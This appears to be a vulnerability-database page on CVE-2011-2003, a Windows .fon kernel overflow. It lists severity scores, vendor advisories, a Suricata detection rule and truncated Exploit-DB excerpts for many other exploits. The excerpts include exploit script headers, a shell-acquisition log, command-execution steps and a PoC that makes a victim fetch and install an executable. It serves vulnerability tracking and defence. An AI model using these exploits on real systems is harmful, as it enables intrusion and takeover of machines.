CVE-2011-2003
Published: 2011-10-12
CVE-2011-2003: Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008…
Priority P268 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public PoC available (see the Exploit-DB entry below)
EPSS: 27.77% (97.8th percentile)
Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability."
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCs (extracted from sources)
- Detect delivery or loading of crafted .fon font files, which trigger a buffer overflow in the win32k.sys kernel-mode driver
- Monitor for unexpected crashes or exploitation activity originating from win32k.sys in kernel mode, particularly when processing .fon files from remote/untrusted sources
- Note: the PoC exploit targets Windows 7 32-bit only; behaviour and exploitability may differ on other affected platforms listed in the CVE
CVSS provenance
nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
ghsa · 6.5 MEDIUM
vendor_redhat · 6.5 MEDIUM
GHSA
GHSA-rr89-f283-c7m9: Buffer overflow in win32k
ghsa_unreviewed·2022-05-13
CVE-2011-2003 [HIGH] CWE-119 GHSA-rr89-f283-c7m9: Buffer overflow in win32k
Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability."
GHSA
JBossWS vulnerable to uncontrolled recursion
ghsa·2022-05-13·CVSS 6.5
CVE-2011-1483 [MEDIUM] CWE-400 JBossWS vulnerable to uncontrolled recursion
JBossWS vulnerable to uncontrolled recursion
DOMUtils.java in org.jboss.ws:jbossws-common does not properly handle recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted request containing an XML document with a DOCTYPE declaration and a large number of nested entity references, a similar issue to CVE-2003-1564.
Red Hat
JBossWS remote Denial of Service
vendor_redhat·2011-09-15·CVSS 6.5
CVE-2011-1483 [MEDIUM] JBossWS remote Denial of Service
JBossWS remote Denial of Service
wsf/common/DOMUtils.java in JBossWS Native in Red Hat JBoss Enterprise Application Platform 4.2.0.CP09, 4.3, and 5.1.1; JBoss Enterprise Portal Platform 4.3.CP06 and 5.1.1; JBoss Enterprise SOA Platform 4.2.CP05, 4.3.CP05, and 5.1.0; JBoss Communications Platform 1.2.11 and 5.1.1; JBoss Enterprise BRMS Platform 5.1.0; and JBoss Enterprise Web Platform 5.1.1 does not properly handle recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted request containing an XML document with a DOCTYPE declaration and a large number of nested entity references, a similar issue to CVE-2003-1564.
Package: Security (Red Hat JBoss BRMS 5) - Affected
Red Hat
ruby: Properly initialize the random number generator when forking new process
vendor_redhat·2011-07-02·CVSS 5.0
CVE-2011-2686 [MEDIUM] ruby: Properly initialize the random number generator when forking new process
ruby: Properly initialize the random number generator when forking new process
Ruby before 1.8.7-p352 does not reset the random seed upon forking, which makes it easier for context-dependent attackers to predict the values of random numbers by leveraging knowledge of the number sequence obtained in a different child process, a related issue to CVE-2003-0900. NOTE: this issue exists because of a regression during Ruby 1.8.6 development.
Package: ruby (Red Hat Enterprise Linux 4) - Affected
Package: ruby (Red Hat Enterprise Linux 5) - Affected
Package: ruby (Red Hat Enterprise Linux 6) - Affected
Red Hat
ruby: Properly initialize the random number generator when forking new process
vendor_redhat·2011-07-02·CVSS 5.0
CVE-2011-3009 [MEDIUM] ruby: Properly initialize the random number generator when forking new process
ruby: Properly initialize the random number generator when forking new process
Ruby before 1.8.6-p114 does not reset the random seed upon forking, which makes it easier for context-dependent attackers to predict the values of random numbers by leveraging knowledge of the number sequence obtained in a different child process, a related issue to CVE-2003-0900.
Statement: The Red Hat Security Response Team has rated this issue as having low security impact, a future update may address this flaw in Red Hat Enterprise Linux 4 and 5.
Red Hat
jabberd: DoS via the XML "billion laughs attack"
vendor_redhat·2011-05-31·CVSS 6.5
CVE-2011-1755 [MEDIUM] jabberd: DoS via the XML "billion laughs attack"
jabberd: DoS via the XML "billion laughs attack"
jabberd2 before 2.2.14 does not properly detect recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, a similar issue to CVE-2003-1564.
Statement: Vulnerable. This issue has been addressed in Red Hat Network Satellite Server v 5.4.1 via RHSA-2011:0882 https://rhn.redhat.com/errata/RHSA-2011-0882.html and in Red Hat Network Proxy Server v5.4.1 via RHSA-2011:0881 https://rhn.redhat.com/errata/RHSA-2011-0881.html. This issue is not planned to be fixed in Red Hat Network Satellite Server versions 5.0.2, 5.1.1, 5.2.1, 5.3.0 and not planned to be fixed in Red Hat Network Proxy Server versions 5.0.
Suricata
ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt
suricata·2011-07-27
CVE-2010-3148 ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt
ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_CLIENT Microsoft Visio 2003 mfc71enu.dll DLL Loading Arbitrary Code Execution Attempt"; flow:established,to_server; http.uri; content:"/mfc71"; nocase; pcre:"/^[a-z]{2,3}\.dll/Ri"; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=23601; reference:url,www.microsoft.com/technet/security/bulletin/MS11-055.mspx; reference:bid,42681; reference:cve,2010-3148; classtype:attempted-user; sid:2013322; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_07_27, cve CVE_2010_3148, deployment Perimeter, confidence Medium, signature_severity Major, tag
Exploit-DB
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
exploitdb·2016-10-24
CVE-2011-1974 Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
Microsoft Windows (x86) - 'NDISTAPI' Local Privilege Escalation (MS11-062)
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062)
# Date: 2016-10-24
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# CVE ID: 2011-1974
################################################################
# Vulnerability description:
# An elevation of privilege vulner
Exploit-DB
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
exploitdb·2016-10-18
CVE-2011-1249 Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)
---
/*
################################################################
# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046)
# Date: 2016-10-16
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Vista SP1 x64
# Windows Vista SP2 x64
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows Server 2008 x64
# Windows Server 2008 SP2 x64
# Windows Server 2008 Itanium-based Systems
# Windows Server 2008 SP2 Itanium-based Systems
# Windows 7 x86
# Windows 7 SP1 x86
# Wi
Exploit-DB
HP Data Protector - CMD Install Service (Metasploit)
exploitdb·2013-08-02·CVSS 10.0
CVE-2011-0922 [CRITICAL] HP Data Protector - CMD Install Service (Metasploit)
HP Data Protector - CMD Install Service (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-13-07
# Exploit Author: Ben Turner, Doug McLeod
# Vendor Homepage: www.hp.com
# Version: 6.10 & 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
require 'msf/core'
class Metasploit3 'HP Data Pro
Exploit-DB
Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2013-01-04
CVE-2011-5227 Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)
Enterasys NetSight - 'nssyslogd.exe' Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Enterasys NetSight nssyslogd.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Enterasys NetSight. The
vulnerability exists in the Syslog service (nssyslogd.exe) when parsing a specially
crafted PRIO from a syslog message. The module has been tested successfully on
Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.
},
'Author' =>
[
'Jeremy Brown', # Vulnerability discovery
'rgod ', #
Exploit-DB
HP Data Protector Client - EXEC_CMD Remote Code Execution
exploitdb·2012-06-19·CVSS 10.0
CVE-2011-0922 [CRITICAL] HP Data Protector Client - EXEC_CMD Remote Code Execution
HP Data Protector Client - EXEC_CMD Remote Code Execution
---
#!/usr/bin/env python
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
import socket
import sys
import binascii
if len(sys.argv) != 4:
print ""
print "\033[0;31mUsage: ./hp_protector.py \033[0m"
print ""
print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\\\Omniback\\i386\\installservice.exe\033[0m"
print
Exploit-DB
SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection
exploitdb·2012-05-01
CVE-2012-2576 SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection
SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection
---
#!/usr/bin/python
######################################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################
import urllib, urllib2, cookielib
import sys
import random
print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Explo
Exploit-DB
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion
exploitdb·2012-03-19
CVE-2012-1196 LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion
---
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server WSVulnerabilityCore.dll
SetTaskLogByFile() Remote Arbitrary File Deletion Vulnerability
Tested against: Microsoft Windows Server 2003 r2 sp2
Software home page: http://www.landesk.com/lenovo/thinkmanagement-console.aspx
Download url: http://www.landesk.com/downloads/lenovo/50.aspx
Files tested:
ThinkManagement9.0.2.exe
LD90-SP2-MCP_CONS-2011-0428.exe
LD90-SP2-MCP_SD-2011-0428.exe
ThinkManagementConsole9.0.3_b28.zip
Instructions were to install 9.0.2, then apply two patches, finally to install 9.0.3
Background:
The mentioned product creates various virtual directories on IIS.
Among them the 'WSVulnerabilityCore' one.
Without prior authenticatio
Exploit-DB
LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution
exploitdb·2012-03-19
CVE-2012-1195 LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution
LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution
---
LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server AMTConfig.Business.dll
RunAMTCommand Remote Code Execution Vulnerability
Tested against: Microsoft Windows Server 2003 r2 sp2
Software home page: http://www.landesk.com/lenovo/thinkmanagement-console.aspx
Download url: http://www.landesk.com/downloads/lenovo/50.aspx
Files tested:
ThinkManagement9.0.2.exe
LD90-SP2-MCP_CONS-2011-0428.exe
LD90-SP2-MCP_SD-2011-0428.exe
ThinkManagementConsole9.0.3_b28.zip
Instructions were to install 9.0.2, then apply two patches, finally to install 9.0.3
Background:
The mentioned product creates various virtual directories on IIS.
Among them the 'core.anonymous' one inside the 'landesk' tree.
Without prior authentic
Exploit-DB
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
exploitdb·2011-11-30·CVSS 7.8
CVE-2011-2005 [HIGH] Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
---
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng
Exploit-DB
VMware - Update Manager Directory Traversal
exploitdb·2011-11-21·CVSS 5.0
CVE-2011-4404 [MEDIUM] VMware - Update Manager Directory Traversal
VMware - Update Manager Directory Traversal
---
# Exploit Title:VMware Update Manager Directory Traversal
# Date:18/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.vmware.com/
# Version:2.0.2
# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
# CVE : CVE-2011-4404
DSECRG-11-042 VMware Update Manager - Directory Traversal
Application: VMware Update Manager
Versions Affected: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4.0 prior to Update 4
Vendor URL: http://vmware.com
Bugs: Directory Traversal File Read
CVE: CVE-2011-4404
CVSS2: 7.8
Exploits: YES
Reported: 06.06.2010
Vendor response: 06.06.2010
Date of Public Advisory: 18.11.2011
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
Description
Di
Exploit-DB
NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
exploitdb·2011-10-31
CVE-2011-4040 NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
---
##
# Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
# Date: 10/31/2011
# Author: Dillon Beresford
# Twitter: https://twitter.com/#!/D1N
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.00 and prior
# Build: 11818 and prior
# Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
# CVE : NONE
# Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
# manils, d0tslash, mublix, halsten, and everyone at AHA!
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
Exploit-DB
Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)
exploitdb·2011-10-13·CVSS 9.3
CVE-2011-2003 [CRITICAL] Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)
Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)
---
# Exploit Title: MS11-077 .fon buffer overrun kernel-mode drivers exploit
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Software Link:
# Version: Windows 7 32bit, fully patched until Sep. 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-2003
Exploit is downloadable from:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17978.tar.gz (my.fon.tar.gz)
http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/
Byoungyoung
Exploit-DB
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
exploitdb·2011-09-22
CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB
Blue Coat Reporter - Directory Traversal
exploitdb·2011-09-22
CVE-2011-5127 Blue Coat Reporter - Directory Traversal
Blue Coat Reporter - Directory Traversal
---
# Exploit Title: Blue Coat Reporter Unauthenticated Directory Traversal
# Author: nitr0us / http://twitter.com/nitr0usmx
# Software Link: http://www.bluecoat.com/products/reporter
# Version: 9.2.x - 9.1.x
# Tested on: Windows Server 2003 Standard
Blue Coat Reporter Unauthenticated Directory Traversal
### PUBLIC RELEASE ###
My gift to Ekoparty Security Conference 2011 @ Argentina
What a great event!
21/Sept/2011
### PUBLIC RELEASE ###
Vulnerability Information
Vendor: Blue Coat Systems, Inc. (NASDAQ: BCSI) - http://www.bluecoat.com
Product: Blue Coat Reporter - http://www.bluecoat.com/products/reporter
Versions: 9.2.x - 9.1.x
Platform: Windows (the Linux installation is not vulnerable)
Tested on: Blue Coat Reporter 9.2.3 on Windows Server 2
Exploit-DB
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
exploitdb·2011-07-26
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities
---
# Exploit Title:CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution
# Google Dork: /
# Date: 25 July 2011
# Author: rgod
# Software Link: /
# Version: r15.0
# Tested on: Microsoft Windows Server 2003 r2 sp2
# CVE : none
Administrator
Password -> MY_PASSWORD
A remote attacker could then login to the affected application
then execute arbitrary commands with Administrator group privileges
in the following way:
Browse Backup settings;
Click Advanced tab;
Check "Run a command before backup is started";
Fill the white field with the desired command, ex. cmd /c start calc ;
Fill the credentials fields with the gained username and password
(you can use the same you had before);
Select an exis
Exploit-DB
HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)
exploitdb·2011-07-02
CVE-2011-1865 HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)
HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)
---
#!/usr/bin/python
# HP Data Protector 6.11 Remote Buffer Overflow
# Tested on Windows 2003 R2 + DEP Enabled
# Authors: muts & dookie
# Reference: http://www.exploit-db.com/exploits/17458/
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt
import struct, socket, sys
target = sys.argv[1]
# bindshell - port 4444
Exploit-DB
Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb·2011-06-13·CVSS 4.3
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
Oracle HTTP Server - Cross-Site Scripting Header Injection
---
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
exploitdb·2011-05-29·CVSS 10.0
CVE-2011-0922 [CRITICAL] HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
---
# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file
# from a share (\\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with
# this payload share a malicious file via HTTP
Exploit-DB
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
exploitdb·2011-05-28·CVSS 10.0
CVE-2011-0923 [CRITICAL] HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution
---
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
# Date: 2011-05-28
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Greetz to all the Exploit-DB Dev Team.
import socket
import sys
if len(sys.argv) != 3:
print "Usage: ./ZDI-11-055.py "
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
# The following PoC takes advantage of a Directory Path Traversal to execute ipconfig.exe on the remote host.
# Tw
Exploit-DB
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
exploitdb·2011-04-27
CVE-2010-0620 EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
EMC HomeBase Server - Directory Traversal Remote Code Execution (Metasploit)
---
##
# $Id: emc_homebase_exec.rb 12458 2011-04-27 20:29:27Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'EMC HomeBase Server Directory Traversal Remote Code Execution',
'Description' => %q{
This module exploits a directory traversal and remote code execution
flaw in EMC HomeBase Server 6.3.0.
Note: This module has only been tested against Windows XP SP3 and Windows 2003 SP2
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12458
Exploit-DB
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
exploitdb·2011-04-16
CVE-2009-0565 Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
---
##
# $Id: ms09-027 10477 2011-04-13 11:59:02Z mc $
##
##
# This file is not part of the Metasploit Framework and may not be subject to
# redistribution and commercial restrictions.
##
#TODO some testing to find the real banned characters and maxlen
# add those parameters to the .rb file
# drop in appropriate directory
# ulimit -s 100000 is required to run this exploit appropriately
require 'msf/core'
#require 'zlib'
class Metasploit3 'MS Word Record Parsing Buffer Overflow(MS-09-027)',
'Description' => %q{
MS Word Record Parsing Buffer Overflow(MS-09-027)
Vulnerable application MS Office 2003
Tested on XP SP2 - MS Office 2003 v. 11.5604.5606
Bug Found By Wushi of team509
Greets Villy, Abhishek Lyall and A
Exploit-DB
.NET Runtime Optimization Service - Local Privilege Escalation
exploitdb·2011-03-08
.NET Runtime Optimization Service - Local Privilege Escalation
.NET Runtime Optimization Service - Local Privilege Escalation
---
/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/
xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
This one's a no-brainer, plain simple:
This service's EXE file can be overwritten by any non-admin domain user
and local power users (which are the default permissions set).
This exploit compiles to a service that uses the original service's id.
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow
exploitdb·2011-02-14
CVE-2011-0654 Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow
Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow
---
####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse th
Exploit-DB
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
exploitdb·2011-01-11
CVE-2003-0352 Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
---
##
# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft RPC DCOM Interface Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windo
Zscaler
Zscaler found Multiple Security Vulnerabilities | 11-11-2011
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 11-11-2011
Bugzilla
